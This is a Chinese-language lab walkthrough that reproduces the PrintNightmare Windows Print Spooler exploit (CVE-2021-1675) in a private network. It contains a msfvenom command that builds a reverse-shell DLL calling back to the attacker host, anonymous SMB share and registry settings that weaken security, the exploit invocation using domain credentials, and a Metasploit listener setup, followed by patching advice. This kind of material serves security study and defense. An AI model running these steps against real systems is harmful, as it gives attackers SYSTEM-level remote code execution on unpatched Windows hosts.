1. 漏洞详情
Microsoft Windows Print Spooler 服务未能限制对RpcAddPrinterDriverEx()函数的访问,该函数可能允许远程身份验证的攻击者以系统权限在易受攻击的系统上执行任意代码。
RpcAddPrinterDriverEx()函数用于在系统上安装打印机驱动程序,此函数的参数之一是DRIVER_CONTAINER对象,它包含有关添加的打印机将使用哪个驱动程序的信息。
另一个参数dwFileCopyFlags指定如何复制替换打印机驱动程序文件。攻击者可以利用任何经过身份验证的用户都可以调用RpcAddPrinterDriverEx()并指定位于远程服务器上的驱动程序文件,这会导致 Print Spooler 服务spoolsv.exe以 SYSTEM 权限执行任意 DLL 文件中的代码。
影响版本:
代码语言:javascript复制Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
2.漏洞复现
环境:本机win11
攻击机:kali虚拟机
ip地址:192.168.133.145
网络模式:nat模式
模拟受害者机器:windows server 2016
ip地址:192.168.133.129
网络模式:nat模式
2.1 server 2016开启打印机服务
这个打印机服务默认开启,如果没有开启可以打开。
2.2 DLL文件生成
kali到tmp目录使用msfvenom生成dll文件,在这里也可以使用Cobal strike生成dll文件。
代码语言:javascript复制msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.133.145 LPORT=3333 -o reverse.dll
2.3 SMB 配置
kali配置SMB服务,使它可以匿名访问,方便上传reverse.dll文件到windows server 2016上。
代码语言:javascript复制cat /etc/samba/smb.conf
sudo service smbd start
smb.conf内容如下所示
代码语言:javascript复制[global]
workgroup = workgroup
server string = test
netbios name = MZ
security = user
map to guest = Bad User
smb ports = 445
log file = /var/log/samba/log.%m
max log size = 5
[smb]
comment = Samba
browseable = yes
writeable = yes
public = yes
path = /tmp/
read only = no
guest ok = yes
如果你使用windows配置SMB服务,可以如下配置。
代码语言:javascript复制mkdir C:share
icacls C:share /T /grant Anonymous` logon:r
icacls C:share /T /grant Everyone:r
New-SmbShare -Path C:share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLMSystemCurrentControlSetServicesLanManServerParameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLMSystemCurrentControlSetServicesLanManServerParameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLMSystemCurrentControlSetControlLsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLMSystemCurrentControlSetControlLsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
# Reboot
kali开启SMB匿名访问后在WIN11的网络处访问\192.168.133.145,如果能访问smb目录表示配置成功。
2.4 下载脚本
github下载这个项目,这里在github网址后面加上.cnpmjs.org做下载加速。
代码语言:javascript复制git clone https://github.com.cnpmjs.org/cube0x0/CVE-2021-1675.git
impacket也需要重新安装。
代码语言:javascript复制pip3 uninstall impacket
git clone https://github.com.cnpmjs.org/cube0x0/impacket
cd impacket
sudo python3 ./setup.py install sudo
检查目标是不是存在漏洞,如果有输出表示存在,可以做一个简单判断。
rpcdump.py @192.168.133.1 | grep MS-RPRN
2.4 漏洞利用
在脚本文件目录下执行以下代码,hai:serverpass@2为server2016普通域用户名和密码。
代码语言:javascript复制python3 CVE-2021-1675.py hai:serverpass@2@192.168.133.129 '\192.168.133.145smb'
msf建立监听
代码语言:javascript复制msf6 > use multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.133.145
msf6 exploit(multi/handler) > set LPORT 3333
如果出现以下错误,可能是没有配置好SMB匿名访问。
运行成功如下显示
用windows server 2012 R2做实验,发现能上传但不能执行,没有成功复现。
3.防御措施
1.目前微软官方已针对支持的系统版本发布了修复该漏洞的安全补丁,官方下载链接https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675。
2.临时禁用Print Spooler服务。在服务应用(services.msc)中找到Print Spooler服务,停止运行服务,同时将"启动类型"修改为"禁用"。
参考链接
代码语言:javascript复制1.https://www.kb.cert.org/vuls/id/383432
2.https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675
3.https://github.com/afwu/PrintNightmare
4.https://github.com/cube0x0/CVE-2021-1675